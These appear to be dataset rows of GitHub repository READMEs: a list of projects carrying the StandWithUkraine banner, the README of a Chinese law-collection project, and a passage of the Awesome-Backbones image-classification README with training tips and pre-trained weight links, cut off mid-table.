- [phpbench](https://github.com/phpbench/phpbench) - PHPBench is a benchmark runner for PHP analogous to PHPUnit but for performance rather than correctness
- [Codeception](https://github.com/Codeception/Codeception) - Codeception is a modern full-stack testing framework for PHP. Inspired by BDD
- [PHPUnit](https://github.com/sebastianbergmann/phpunit) - PHPUnit is the most commonly used testing framework for PHP
- [Payum](https://github.com/Payum/Payum) - Payum is a PHP Payment processing library. It offers everything you need to work with payments
- [Soketi](https://github.com/soketi/soketi) - soketi is your simple, fast, and resilient open-source WebSockets server
- [PHPMailer](https://github.com/PHPMailer/PHPMailer) - The classic email sending library for PHP
- [Awesome Crystal](https://github.com/veelenga/awesome-crystal) - A collection of awesome Crystal libraries, tools, frameworks and software
- [bcrypt.net](https://github.com/BcryptNet/bcrypt.net) - Porting of bcrypt.codeplex.com with enhanced security, missing fixes, features and better .net support
- [lvgl-rs](https://github.com/rafaelcaricio/lvgl-rs) - Open-source Embedded GUI Library in Rust
- [iban-validation](https://github.com/jschaedl/iban-validation) - A small library for validating International BankAccount Numbers (IBANs)
- [portable-ascii](https://github.com/voku/portable-ascii) - Portable ASCII library - performance optimized (ascii) string functions for PHP
- [comfey](https://github.com/dejavu1987/comfey) - Comfey is a tiny data binding library inspired by React hook useState
- [terraform-aws-modules](https://github.com/terraform-aws-modules) - Collection of Terraform AWS modules supported by the community
- [USDCUP.io](https://github.com/elvismdev/usdcup.io) - Web App that finds and tracks the average price of USD vs CUP in the informal (street) market in Cuba
- [CherryPy](https://github.com/cherrypy/cherrypy) - A Minimalist Python Web Framework
- [Cheroot](https://github.com/cherrypy/cheroot) - A high-performance, pure-Python HTTP server used by CherryPy
- [octomachinery](https://github.com/sanitizers/octomachinery) - Invisible engine driving octobot machines. Simple, yet powerful. A pythonic framework for making GitHub Apps-powered bots
- [Better Go Playground](https://github.com/x1unix/go-playground) - Go playground alternative with syntax highlight, code autocomplete and WebAssembly support
- [Canvacord](https://github.com/CesiumLabs/canvacord) - Simple & easy to use image manipulation module for beginners
- [spaceship-prompt](https://github.com/spaceship-prompt/spaceship-prompt) — Minimalistic, powerful and extremely customizable Zsh prompt
- [wtfjs](https://github.com/denysdovhan/wtfjs) — A list of funny and tricky JavaScript examples
- [bash-handbook](https://github.com/denysdovhan/bash-handbook) — A handbook for those who want to learn Bash
- [vacuum-card](https://github.com/denysdovhan/vacuum-card) — Vacuum cleaner card for Home Assistant Lovelace UI
- [purifier-card](https://github.com/denysdovhan/purifier-card) — Air Purifier card for Home Assistant Lovelace UI
- [Moped](https://github.com/RobertoMachorro/Moped) - A general purpose text editor, small and light
- [fluent-vue](https://github.com/Demivan/fluent-vue) - Internationalization plugin for Vue.js
- [Kap](https://github.com/wulkano/Kap) - An open-source screen recorder built with web technology
- [bootScore](https://github.com/bootscore/bootscore) - A powerful, free Bootstrap 5 starter theme for WordPress
- [UAdata](https://github.com/uadata/uadata) - Ukrainian data hub with API
- [MahApps.Metro](https://github.com/MahApps/MahApps.Metro) - A toolkit for creating modern WPF applications. Lots of goodness out-of-the box
- [MahApps.Metro.IconPacks](https://github.com/MahApps/MahApps.Metro.IconPacks) - Awesome icon packs for WPF and UWP in one library
- [GongSolutions.WPF.DragDrop](https://github.com/punker76/gong-wpf-dragdrop) - An easy to use drag'n'drop framework for WPF
- [ElectricsEagles](https://github.com/Electrics-Eagles) - ElectricsEagles drones
- [PokeTube](https://github.com/iamashley0/poketube/) - An Youtube player thats focused on privacy
- [ProxyManager](https://github.com/Ocramius/ProxyManager) - A PHP library that aims to provide abstraction for generating various kinds of proxy classes
- [FAR.js](https://github.com/farjs/farjs) - Cross-platform File and ARchive Manager in your terminal
- [Stacks.js](https://github.com/stacksjs) - Develop modern clouds, apps & framework-agnostic libraries, faster
- [django-content-settings](https://github.com/occipital/django-content-settings) - The most advanced admin editable setting for Django
- [**...and more than 23000 others**](https://github.com/search?q=vshymanskyy%2FStandWithUkraine&type=code)
| #StandWithUkraine banner and related documents | ukraine,standwithukraine,stoprussionagression,stopputinnow,russia,belarus | 0 | 61 | 110 | 559 | 27 | 3 | 0 |
LawRefBook/Laws | ---
draft: true
---
This project collects laws and regulations, departmental rules, cases, and similar documents, and processes them by chapter and other structural information.
## Applications
- [LawRefBook](https://github.com/RanKKI/LawRefBook) is a native iOS app built with SwiftUI.
## Contribution guide
### Manual contribution
- Following the format of the [law template](法律法规模版.md), place the law in the appropriate location under the `法律法规` folder
- Run `python database.py` in the `scripts` directory (this automatically updates the `sqlite` content)
- Commit your changes and open a PR
### Automated script
The `scripts` directory contains a `request.py` script that can crawl the latest laws and regulations from the [National Database of Laws and Regulations](https://flk.npc.gov.cn).
Run the following commands in the `scripts` directory:
- `python request.py` (the script handles everything automatically, adding new laws to the list and placing them in the appropriate location)
- `python database.py` (automatically updates the `sqlite` content)
- Commit your changes and open a PR
---
PS: If you find that a law is incomplete or has problems, or you need something added but don't know how to open a PR yourself, you can open an issue or contact me via the email address in the settings, and I will fix or add it in the next release | null | null | 1 | 2 | 1 | 91 | 8 | 2 | 1 |
Fafa-DL/Awesome-Backbones | Awesome backbones for image classification
===========================
<div align="center">
[![BILIBILI](https://raw.githubusercontent.com/Fafa-DL/readme-data/main/Bilibili.png)](https://space.bilibili.com/46880349)
![](https://img.shields.io/badge/Awesome%20Backbones-v0.6.3-brightgreen)
![](https://img.shields.io/badge/PyTorch-%3E%3Dv1.7.1-green)
![](https://img.shields.io/badge/Python-%3E%3Dv3.6-yellowgreen)
[![GitHub forks](https://img.shields.io/github/forks/Fafa-DL/Awesome-Backbones)](https://github.com/Fafa-DL/Awesome-Backbones)
[![GitHub stars](https://img.shields.io/github/stars/Fafa-DL/Awesome-Backbones)](https://github.com/Fafa-DL/Awesome-Backbones)
</div>
## Before you start
- If training does not go well, first tune the learning rate and batch size; these two hyperparameters largely determine convergence. Next, start by turning off image augmentation (especially on small datasets), since some augmentation methods can corrupt the data, e.g.
![](https://raw.githubusercontent.com/Fafa-DL/readme-data/main/backbones/fail01.jpg) ![](https://raw.githubusercontent.com/Fafa-DL/readme-data/main/backbones/fail02.jpg) ![](https://raw.githubusercontent.com/Fafa-DL/readme-data/main/backbones/fail03.jpg)
  How do you remove the augmentation? For example, in the [efficientnetv2-b0](https://github.com/Fafa-DL/Awesome-Backbones/blob/main/models/efficientnetv2/efficientnetv2_b0.py) config file, `train_pipeline` can be changed to the following:
```yaml
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='RandomResizedCrop',
size=192,
efficientnet_style=True,
interpolation='bicubic'),
dict(type='Normalize', **img_norm_cfg),
dict(type='ImageToTensor', keys=['img']),
dict(type='ToTensor', keys=['gt_label']),
dict(type='Collect', keys=['img', 'gt_label'])
]
```
  If your dataset has already been resized to the shape required by the network, the `Resize` operation can also be removed.
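If you do drop it, a minimal sketch of the resulting `train_pipeline` (the block above with the crop/resize step removed) would be:
```yaml
train_pipeline = [
    dict(type='LoadImageFromFile'),
    dict(type='Normalize', **img_norm_cfg),
    dict(type='ImageToTensor', keys=['img']),
    dict(type='ToTensor', keys=['gt_label']),
    dict(type='Collect', keys=['img', 'gt_label'])
]
```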
## Changelog
**`2023.12.02`**
- Added the **Train Acc** and **Val loss** outputs that many users asked for in the Issues
- `metrics_outputs.csv` now stores the per-epoch `train_loss, train_acc, train_precision, train_recall, train_f1-score, val_loss, val_acc, val_precision, val_recall, val_f1-score` values to make plotting easier
- The terminal now prints both Train and Val metrics instead of only the **Val** metrics
![](https://raw.githubusercontent.com/Fafa-DL/readme-data/main/backbones/terminal.jpg)
**`2023.08.05`**
- Added **TinyViT** (pre-trained weights do not match), **DeiT3**, **EdgeNeXt**, and **RevVisionTransformer**
**`2023.03.07`**
- Added **MobileViT**, **DaViT**, **RepLKNet**, **BEiT**, **EVA**, **MixMIM**, and **EfficientNetV2**
**`2022.11.20`**
- Added an option for whether the test set is used as the validation set; if not, a validation set is split from the training set by a given ratio, randomly picking one fold of the training set as validation (similar to, but not exactly, k-fold; it can be adapted to true k-fold with small changes). See the [Training tutorial](https://github.com/Fafa-DL/Awesome-Backbones/blob/main/datas/docs/How_to_train.md)
**`2022.11.06`**
- Added the **HorNet**, **EfficientFormer**, **SwinTransformer V2**, and **MViT** models
## Test environment
- Pytorch 1.7.1+
- Python 3.6+
## Resources
|Dataset|Video tutorial|AI discussion QQ groups|
|---|---|---|
|[`Flower dataset` (extraction code: 0zat)](https://pan.baidu.com/s/1137y4l-J3AgyCiC_cXqIqw)|[Click here](https://www.bilibili.com/video/BV1SY411P7Nd)|[Group 1: 78174903](https://jq.qq.com/?_wv=1027&k=lY5KVICA)<br/>[Group 3: 584723646](https://jq.qq.com/?_wv=1027&k=bakez5Yz)
## Quick start
- Follow [Environment setup](https://github.com/Fafa-DL/Awesome-Backbones/blob/main/datas/docs/Environment_setting.md) to complete the configuration
- Download the [MobileNetV3-Small](https://download.openmmlab.com/mmclassification/v0/mobilenet_v3/convert/mobilenet_v3_small-8427ecf0.pth) weights into **datas**
- In a terminal under the **Awesome-Backbones** folder, run
```bash
python tools/single_test.py datas/cat-dog.png models/mobilenet/mobilenet_v3_small.py --classes-map datas/imageNet1kAnnotation.txt
```
## Tutorials
- [Environment setup](https://github.com/Fafa-DL/Awesome-Backbones/blob/main/datas/docs/Environment_setting.md)
- [Dataset preparation](https://github.com/Fafa-DL/Awesome-Backbones/blob/main/datas/docs/Data_preparing.md)
- [Config file explanation](https://github.com/Fafa-DL/Awesome-Backbones/blob/main/datas/docs/Configs_description.md)
- [Training](https://github.com/Fafa-DL/Awesome-Backbones/blob/main/datas/docs/How_to_train.md)
- [Model evaluation](https://github.com/Fafa-DL/Awesome-Backbones/blob/main/datas/docs/How_to_eval.md)
- [Calculating FLOPs & Params](https://github.com/Fafa-DL/Awesome-Backbones/blob/main/datas/docs/Calculate_Flops.md)
- [Adding new model components](https://github.com/Fafa-DL/Awesome-Backbones/blob/main/datas/docs/Add_modules.md)
- [Class activation map (CAM) visualization](https://github.com/Fafa-DL/Awesome-Backbones/blob/main/datas/docs/CAM_visualization.md)
- [Learning rate schedule visualization](https://github.com/Fafa-DL/Awesome-Backbones/blob/main/datas/docs/Lr_visualization.md)
- [Data augmentation pipeline visualization](https://github.com/Fafa-DL/Awesome-Backbones/blob/main/datas/docs/Pipeline_visualization.md)
## Models
- [x] [LeNet5](https://ieeexplore.ieee.org/document/6795724)
- [x] [AlexNet](https://blog.csdn.net/zzh516451964zzh/article/details/124461111)
- [x] [VGG](https://blog.csdn.net/zzh516451964zzh/article/details/124477080)
- [x] [DenseNet](https://blog.csdn.net/zzh516451964zzh/article/details/124630832)
- [x] [ResNet](https://blog.csdn.net/zzh516451964zzh/article/details/124477575)
- [x] [Wide-ResNet](https://blog.csdn.net/zzh516451964zzh/article/details/124754437)
- [x] [ResNeXt](https://blog.csdn.net/zzh516451964zzh/article/details/124477919)
- [x] [SEResNet](https://blog.csdn.net/zzh516451964zzh/article/details/124478157)
- [x] [SEResNeXt](https://blog.csdn.net/zzh516451964zzh/article/details/124478347)
- [x] [RegNet](https://blog.csdn.net/zzh516451964zzh/article/details/124478426)
- [x] [MobileNetV2](https://blog.csdn.net/zzh516451964zzh/article/details/124478681)
- [x] [MobileNetV3](https://blog.csdn.net/zzh516451964zzh/article/details/124478770)
- [x] [ShuffleNetV1](https://blog.csdn.net/zzh516451964zzh/article/details/124479156)
- [x] [ShuffleNetV2](https://blog.csdn.net/zzh516451964zzh/article/details/124479336)
- [x] [EfficientNet](https://blog.csdn.net/zzh516451964zzh/article/details/124754493)
- [x] [RepVGG](https://blog.csdn.net/zzh516451964zzh/article/details/124479644)
- [x] [Res2Net](https://blog.csdn.net/zzh516451964zzh/article/details/124479467)
- [x] [ConvNeXt](https://blog.csdn.net/zzh516451964zzh/article/details/124481466)
- [x] [HRNet](https://blog.csdn.net/zzh516451964zzh/article/details/124481590)
- [x] [ConvMixer](https://blog.csdn.net/zzh516451964zzh/article/details/124481766)
- [x] [CSPNet](https://blog.csdn.net/zzh516451964zzh/article/details/124481930)
- [x] [Swin-Transformer](https://blog.csdn.net/zzh516451964zzh/article/details/124538198)
- [x] [Vision-Transformer](https://blog.csdn.net/zzh516451964zzh/article/details/124567953)
- [x] [Transformer-in-Transformer](https://blog.csdn.net/zzh516451964zzh/article/details/124596023)
- [x] [MLP-Mixer](https://blog.csdn.net/zzh516451964zzh/article/details/124596093)
- [x] [DeiT](https://blog.csdn.net/zzh516451964zzh/article/details/124591888)
- [x] [Conformer](https://blog.csdn.net/zzh516451964zzh/article/details/124596343)
- [x] [T2T-ViT](https://blog.csdn.net/zzh516451964zzh/article/details/124596425)
- [x] [Twins](https://blog.csdn.net/zzh516451964zzh/article/details/124596619)
- [x] [PoolFormer](https://blog.csdn.net/zzh516451964zzh/article/details/124596740)
- [x] [VAN](https://blog.csdn.net/zzh516451964zzh/article/details/124630541)
- [x] [HorNet](https://arxiv.org/pdf/2207.14284v2.pdf)
- [x] [EfficientFormer](https://arxiv.org/abs/2206.01191)
- [x] [Swin Transformer V2](https://arxiv.org/abs/2111.09883.pdf)
- [x] [MViT V2](http://openaccess.thecvf.com//content/CVPR2022/papers/Li_MViTv2_Improved_Multiscale_Vision_Transformers_for_Classification_and_Detection_CVPR_2022_paper.pdf)
- [x] [MobileViT](https://arxiv.org/abs/2110.02178)
- [x] [DaViT](https://arxiv.org/abs/2204.03645v1)
- [x] [replknet](https://arxiv.org/abs/2203.06717)
- [x] [BEiT](https://arxiv.org/abs/2106.08254)
- [x] [EVA](https://arxiv.org/abs/2211.07636)
- [x] [MixMIM](https://arxiv.org/abs/2205.13137)
- [x] [EfficientNetV2](https://arxiv.org/abs/2104.00298)
## Pre-trained weights
| Name | Weights | Name | Weights | Name | Weights |
| :-----: | :-----: | :------: | :------: | :------: | :-----: |
| **LeNet5** | None | **AlexNet** | None | **VGG** | [VGG-11](https://download.openmmlab.com/mmclassification/v0/vgg/vgg11_batch256_imagenet_20210208-4271cd6c.pth)<br/>[VGG-13](https://download.openmmlab.com/mmclassification/v0/vgg/vgg13_batch256_imagenet_20210208-4d1d6080.pth)<br/>[VGG-16](https://download.openmmlab.com/mmclassification/v0/vgg/vgg16_batch256_imagenet_20210208-db26f1a5.pth)<br/>[VGG-19](https://download.openmmlab.com/mmclassification/v0/vgg/vgg19_batch256_imagenet_20210208-e6920e4a.pth)<br/>[VGG-11-BN](https://download.openmmlab.com/mmclassification/v0/vgg/vgg11_bn_batch256_imagenet_20210207-f244902c.pth)<br/>[VGG-13-BN](https://download.openmmlab.com/mmclassification/v0/vgg/vgg13_bn_batch256_imagenet_20210207-1a8b7864.pth)<br/>[VGG-16-BN](https://download.openmmlab.com/mmclassification/v0/vgg/vgg16_bn_batch256_imagenet_20210208-7e55cd29.pth)<br/>[VGG-19-BN](https://download.openmmlab.com/mmclassification/v0/vgg/vgg19_bn_batch256_imagenet_20210208-da620c4f.pth)|
| **ResNet** |[ResNet-18](https://download.openmmlab.com/mmclassification/v0/resnet/resnet18_8xb32_in1k_20210831-fbbb1da6.pth)<br/>[ResNet-34](https://download.openmmlab.com/mmclassification/v0/resnet/resnet34_8xb32_in1k_20210831-f257d4e6.pth)<br/>[ResNet-50](https://download.openmmlab.com/mmclassification/v0/resnet/resnet50_8xb32_in1k_20210831-ea4938fc.pth)<br/>[ResNet-101](https://download.openmmlab.com/mmclassification/v0/resnet/resnet101_8xb32_in1k_20210831-539c63f8.pth)<br/>[ResNet-152](https://download.openmmlab.com/mmclassification/v0/resnet/resnet152_8xb32_in1k_20210901-4d7582fa.pth) | **ResNetV1C** | [ResNetV1C-50](https://download.openmmlab.com/mmclassification/v0/resnet/resnetv1c50_8xb32_in1k_20220214-3343eccd.pth)<br/>[ResNetV1C-101](https://download.openmmlab.com/mmclassification/v0/resnet/resnetv1c101_8xb32_in1k_20220214-434fe45f.pth)<br/>[ResNetV1C-152](https://download.openmmlab.com/mmclassification/v0/resnet/resnetv1c152_8xb32_in1k_20220214-c013291f.pth) |**ResNetV1D** | [ResNetV1D-50](https://download.openmmlab.com/mmclassification/v0/resnet/resnetv1d50_b32x8_imagenet_20210531-db14775a.pth)<br/>[ResNetV1D-101](https://download.openmmlab.com/mmclassification/v0/resnet/resnetv1d101_b32x8_imagenet_20210531-6e13bcd3.pth)<br/>[ResNetV1D-152](https://download.openmmlab.com/mmclassification/v0/resnet/resnetv1d152_b32x8_imagenet_20210531-278cf22a.pth) |
| **ResNeXt** | [ResNeXt-50](https://download.openmmlab.com/mmclassification/v0/resnext/resnext50_32x4d_b32x8_imagenet_20210429-56066e27.pth)<br/>[ResNeXt-101](https://download.openmmlab.com/mmclassification/v0/resnext/resnext101_32x4d_b32x8_imagenet_20210506-e0fa3dd5.pth)<br/>[ResNeXt-152](https://download.openmmlab.com/mmclassification/v0/resnext/resnext152_32x4d_b32x8_imagenet_20210524-927787be.pth) | **SEResNet** | [SEResNet-50](https://download.openmmlab.com/mmclassification/v0/se-resnet/se-resnet50_batch256_imagenet_20200804-ae206104.pth)<br/>[SEResNet-101](https://download.openmmlab.com/mmclassification/v0/se-resnet/se-resnet101_batch256_imagenet_20200804-ba5b51d4.pth)| **SEResNeXt**| None|
| **RegNet** |[RegNetX-400MF](https://download.openmmlab.com/mmclassification/v0/regnet/regnetx-400mf_8xb128_in1k_20211213-89bfc226.pth)<br/>[RegNetX-800MF](https://download.openmmlab.com/mmclassification/v0/regnet/regnetx-800mf_8xb128_in1k_20211213-222b0f11.pth)<br/>[RegNetX-1.6GF](https://download.openmmlab.com/mmclassification/v0/regnet/regnetx-1.6gf_8xb128_in1k_20211213-d1b89758.pth)<br/>[RegNetX-3.2GF](https://download.openmmlab.com/mmclassification/v0/regnet/regnetx-3.2gf_8xb64_in1k_20211213-1fdd82ae.pth)<br/>[RegNetX-4.0GF](https://download.openmmlab.com/mmclassification/v0/regnet/regnetx-4.0gf_8xb64_in1k_20211213-efed675c.pth)<br/>[RegNetX-6.4GF](https://download.openmmlab.com/mmclassification/v0/regnet/regnetx-6.4gf_8xb64_in1k_20211215-5c6089da.pth)<br/>[RegNetX-8.0GF](https://download.openmmlab.com/mmclassification/v0/regnet/regnetx-8.0gf_8xb64_in1k_20211213-9a9fcc76.pth)<br/>[RegNetX-12GF](https://download.openmmlab.com/mmclassification/v0/regnet/regnetx-12gf_8xb64_in1k_20211213-5df8c2f8.pth) | **MobileNetV2** | [MobileNetV2](https://download.openmmlab.com/mmclassification/v0/mobilenet_v2/mobilenet_v2_batch256_imagenet_20200708-3b2dc3af.pth) |**MobileNetV3** | [MobileNetV3-Small](https://download.openmmlab.com/mmclassification/v0/mobilenet_v3/convert/mobilenet_v3_small-8427ecf0.pth)<br/>[MobileNetV3-Large](https://download.openmmlab.com/mmclassification/v0/mobilenet_v3/convert/mobilenet_v3_large-3ea3c186.pth) |
| **ShuffleNetV1** |[ShuffleNetV1](https://download.openmmlab.com/mmclassification/v0/shufflenet_v1/shufflenet_v1_batch1024_imagenet_20200804-5d6cec73.pth) | **ShuffleNetV2** | [ShuffleNetV2](https://download.openmmlab.com/mmclassification/v0/shufflenet_v2/shufflenet_v2_batch1024_imagenet_20200812-5bf4721e.pth) |**EfficientNet** | [EfficientNet-B0](https://download.openmmlab.com/mmclassification/v0/efficientnet/efficientnet-b0_3rdparty_8xb32_in1k_20220119-a7e2a0b1.pth)<br/>[EfficientNet-B1](https://download.openmmlab.com/mmclassification/v0/efficientnet/efficientnet-b1_3rdparty_8xb32_in1k_20220119-002556d9.pth)<br/>[EfficientNet-B2](https://download.openmmlab.com/mmclassification/v0/efficientnet/efficientnet-b2_3rdparty_8xb32_in1k_20220119-ea374a30.pth)<br/>[EfficientNet-B3](https://download.openmmlab.com/mmclassification/v0/efficientnet/efficientnet-b3_3rdparty_8xb32_in1k_20220119-4b4d7487.pth)<br/>[EfficientNet-B4](https://download.openmmlab.com/mmclassification/v0/efficientnet/efficientnet-b4_3rdparty_8xb32_in1k_20220119-81fd4077.pth)<br/>[EfficientNet-B5](https://download.openmmlab.com/mmclassification/v0/efficientnet/efficientnet-b5_3rdparty_8xb32_in1k_20220119-e9814430.pth)<br/>[EfficientNet-B6](https://download.openmmlab.com/mmclassification/v0/efficientnet/efficientnet-b6_3rdparty_8xb32-aa_in1k_20220119-45b03310.pth)<br/>[EfficientNet-B7](https://download.openmmlab.com/mmclassification/v0/efficientnet/efficientnet-b7_3rdparty_8xb32-aa_in1k_20220119-bf03951c.pth)<br/>[EfficientNet-B8](https://download.openmmlab.com/mmclassification/v0/efficientnet/efficientnet-b8_3rdparty_8xb32-aa-advprop_in1k_20220119-297ce1b7.pth) |
| **RepVGG** |[RepVGG-A0](https://download.openmmlab.com/mmclassification/v0/repvgg/repvgg-A0_3rdparty_4xb64-coslr-120e_in1k_20210909-883ab98c.pth)<br/>[RepVGG-A1](https://download.openmmlab.com/mmclassification/v0/repvgg/repvgg-A1_3rdparty_4xb64-coslr-120e_in1k_20210909-24003a24.pth) <br/>[RepVGG-A2](https://download.openmmlab.com/mmclassification/v0/repvgg/repvgg-A2_3rdparty_4xb64-coslr-120e_in1k_20210909-97d7695a.pth)<br/>[RepVGG-B0](https://download.openmmlab.com/mmclassification/v0/repvgg/repvgg-B0_3rdparty_4xb64-coslr-120e_in1k_20210909-446375f4.pth)<br/>[RepVGG-B1](https://download.openmmlab.com/mmclassification/v0/repvgg/repvgg-B1_3rdparty_4xb64-coslr-120e_in1k_20210909-750cdf67.pth)<br/>[RepVGG-A1](https://download.openmmlab.com/mmclassification/v0/repvgg/repvgg-A1_3rdparty_4xb64-coslr-120e_in1k_20210909-24003a24.pth)<br/>[RepVGG-B1g2](https://download.openmmlab.com/mmclassification/v0/repvgg/repvgg-B1g2_3rdparty_4xb64-coslr-120e_in1k_20210909-344f6422.pth)<br/>[RepVGG-B1g4](https://download.openmmlab.com/mmclassification/v0/repvgg/repvgg-B1g4_3rdparty_4xb64-coslr-120e_in1k_20210909-d4c1a642.pth)<br/>[RepVGG-B2](https://download.openmmlab.com/mmclassification/v0/repvgg/repvgg-B2_3rdparty_4xb64-coslr-120e_in1k_20210909-bd6b937c.pth)<br/>[RepVGG-B2g4](https://download.openmmlab.com/mmclassification/v0/repvgg/repvgg-B2g4_3rdparty_4xb64-autoaug-lbs-mixup-coslr-200e_in1k_20210909-7b7955f0.pth)<br/>[RepVGG-B2g4](https://download.openmmlab.com/mmclassification/v0/repvgg/repvgg-B2g4_3rdparty_4xb64-autoaug-lbs-mixup-coslr-200e_in1k_20210909-7b7955f0.pth)<br/>[RepVGG-B3](https://download.openmmlab.com/mmclassification/v0/repvgg/repvgg-B3_3rdparty_4xb64-autoaug-lbs-mixup-coslr-200e_in1k_20210909-dda968bf.pth)<br/>[RepVGG-B3g4](https://download.openmmlab.com/mmclassification/v0/repvgg/repvgg-B3g4_3rdparty_4xb64-autoaug-lbs-mixup-coslr-200e_in1k_20210909-4e54846a.pth)<br/>[RepVGG-D2se](https://download.openmmlab.com/mmclassification/v0/repvgg/repvgg-D2se_3rdparty_4xb64-autoaug-lbs-mixup-coslr-200e_in1k_20210909-cf3139b7.pth)| **Res2Net** | [Res2Net-50-14w-8s](https://download.openmmlab.com/mmclassification/v0/res2net/res2net50-w14-s8_3rdparty_8xb32_in1k_20210927-bc967bf1.pth)<br/>[Res2Net-50-26w-8s](https://download.openmmlab.com/mmclassification/v0/res2net/res2net50-w26-s8_3rdparty_8xb32_in1k_20210927-f547a94b.pth)<br/>[Res2Net-101-26w-4s](https://download.openmmlab.com/mmclassification/v0/res2net/res2net101-w26-s4_3rdparty_8xb32_in1k_20210927-870b6c36.pth)<br/> |**ConvNeXt** | [ConvNeXt-Tiny](https://download.openmmlab.com/mmclassification/v0/convnext/convnext-tiny_3rdparty_32xb128_in1k_20220124-18abde00.pth)<br/>[ConvNeXt-Small](https://download.openmmlab.com/mmclassification/v0/convnext/convnext-small_3rdparty_32xb128_in1k_20220124-d39b5192.pth)<br/>[ConvNeXt-Base](https://download.openmmlab.com/mmclassification/v0/convnext/convnext-base_in21k-pre-3rdparty_32xb128_in1k_20220124-eb2d6ada.pth)<br/>[ConvNeXt-Large](https://download.openmmlab.com/mmclassification/v0/convnext/convnext-large_in21k-pre-3rdparty_64xb64_in1k_20220124-2412403d.pth)<br/>[ConvNeXt-XLarge](https://download.openmmlab.com/mmclassification/v0/convnext/convnext-xlarge_in21k-pre-3rdparty_64xb64_in1k_20220124-76b6863d.pth) |
| **HRNet** |[HRNet-W18](https://download.openmmlab.com/mmclassification/v0/hrnet/hrnet-w18_3rdparty_8xb32_in1k_20220120-0c10b180.pth)<br/>[HRNet-W30](https://download.openmmlab.com/mmclassification/v0/hrnet/hrnet-w30_3rdparty_8xb32_in1k_20220120-8aa3832f.pth) <br/>[HRNet-W32](https://download.openmmlab.com/mmclassification/v0/hrnet/hrnet-w32_3rdparty_8xb32_in1k_20220120-c394f1ab.pth)<br/>[HRNet-W40](https://download.openmmlab.com/mmclassification/v0/hrnet/hrnet-w40_3rdparty_8xb32_in1k_20220120-9a2dbfc5.pth)<br/>[HRNet-W44](https://download.openmmlab.com/mmclassification/v0/hrnet/hrnet-w44_3rdparty_8xb32_in1k_20220120-35d07f73.pth)<br/>[HRNet-W48](https://download.openmmlab.com/mmclassification/v0/hrnet/hrnet-w48_3rdparty_8xb32_in1k_20220120-e555ef50.pth)<br/>[HRNet-W64](https://download.openmmlab.com/mmclassification/v0/hrnet/hrnet-w64_3rdparty_8xb32_in1k_20220120-19126642.pth) | **ConvMixer** | [ConvMixer-768/32](https://download.openmmlab.com/mmclassification/v0/convmixer/convmixer-768-32_3rdparty_10xb64_in1k_20220323-bca1f7b8.pth)<br/>[ConvMixer-1024/20](https://download.openmmlab.com/mmclassification/v0/convmixer/convmixer-1024-20_3rdparty_10xb64_in1k_20220323-48f8aeba.pth)<br/>[ConvMixer-1536/20](https://download.openmmlab.com/mmclassification/v0/convmixer/convmixer-1536_20_3rdparty_10xb64_in1k_20220323-ea5786f3.pth) |**CSPNet** | [CSPDarkNet50](https://download.openmmlab.com/mmclassification/v0/cspnet/cspdarknet50_3rdparty_8xb32_in1k_20220329-bd275287.pth)<br/>[CSPResNet50](https://download.openmmlab.com/mmclassification/v0/cspnet/cspresnet50_3rdparty_8xb32_in1k_20220329-dd6dddfb.pth)<br/>[CSPResNeXt50](https://download.openmmlab.com/mmclassification/v0/cspnet/cspresnext50_3rdparty_8xb32_in1k_20220329-2cc84d21.pth) |
|**Swin Transformer**|[tiny-224](https://download.openmmlab.com/mmclassification/v0/swin-transformer/swin_tiny_224_b16x64_300e_imagenet_20210616_090925-66df6be6.pth)<br/>[small-224](https://download.openmmlab.com/mmclassification/v0/swin-transformer/swin_small_224_b16x64_300e_imagenet_20210615_110219-7f9d988b.pth)<br/>[base-224](https://download.openmmlab.com/mmclassification/v0/swin-transformer/swin_base_224_b16x64_300e_imagenet_20210616_190742-93230b0d.pth)<br/>[large-224](https://download.openmmlab.com/mmclassification/v0/swin-transformer/convert/swin_large_patch4_window7_224_22kto1k-5f0996db.pth)<br/>[base-384](https://download.openmmlab.com/mmclassification/v0/swin-transformer/convert/swin_base_patch4_window12_384_22kto1k-d59b0d1d.pth)<br/>[large-384](https://download.openmmlab.com/mmclassification/v0/swin-transformer/convert/swin_large_patch4_window12_384_22kto1k-0a40944b.pth)|**Vision Transformer**|[vit_base_p16_224](https://download.openmmlab.com/mmclassification/v0/vit/pretrain/vit-base-p16_3rdparty_pt-64xb64_in1k-224_20210928-02284250.pth)<br/>[vit_base_p32_224](https://download.openmmlab.com/mmclassification/v0/vit/pretrain/vit-base-p32_3rdparty_pt-64xb64_in1k-224_20210928-eee25dd4.pth)<br/>[vit_large_p16_224](https://download.openmmlab.com/mmclassification/v0/vit/pretrain/vit-large-p16_3rdparty_pt-64xb64_in1k-224_20210928-0001f9a1.pth)<br/>[vit_base_p16_384](https://download.openmmlab.com/mmclassification/v0/vit/finetune/vit-base-p16_in21k-pre-3rdparty_ft-64xb64_in1k-384_20210928-98e8652b.pth)<br/>[vit_base_p32_384](https://download.openmmlab.com/mmclassification/v0/vit/finetune/vit-base-p32_in21k-pre-3rdparty_ft-64xb64_in1k-384_20210928-9cea8599.pth)<br/>[vit_large_p16_384](https://download.openmmlab.com/mmclassification/v0/vit/finetune/vit-large-p16_in21k-pre-3rdparty_ft-64xb64_in1k-384_20210928-b20ba619.pth)|**Transformer in Transformer**|[TNT-small](https://download.openmmlab.com/mmclassification/v0/tnt/tnt-small-p16_3rdparty_in1k_20210903-c56ee7df.pth)|
|**MLP Mixer**|[base_p16](https://download.openmmlab.com/mmclassification/v0/mlp-mixer/mixer-base-p16_3rdparty_64xb64_in1k_20211124-1377e3e0.pth)<br/>[large_p16](https://download.openmmlab.com/mmclassification/v0/mlp-mixer/mixer-large-p16_3rdparty_64xb64_in1k_20211124-5a2519d2.pth)|**Deit**|[DeiT-tiny](https://download.openmmlab.com/mmclassification/v0/deit/deit-tiny_pt-4xb256_in1k_20220218-13b382a0.pth)<br/>[DeiT-tiny distilled](https://download.openmmlab.com/mmclassification/v0/deit/deit-tiny-distilled_3rdparty_pt-4xb256_in1k_20211216-c429839a.pth)<br/>[DeiT-small](https://download.openmmlab.com/mmclassification/v0/deit/deit-small_pt-4xb256_in1k_20220218-9425b9bb.pth)<br/>[DeiT-small distilled](https://download.openmmlab.com/mmclassification/v0/deit/deit-small-distilled_3rdparty_pt-4xb256_in1k_20211216-4de1d725.pth)<br/>[DeiT-base](https://download.openmmlab.com/mmclassification/v0/deit/deit-base_pt-16xb64_in1k_20220216-db63c16c.pth)<br/>[DeiT-base 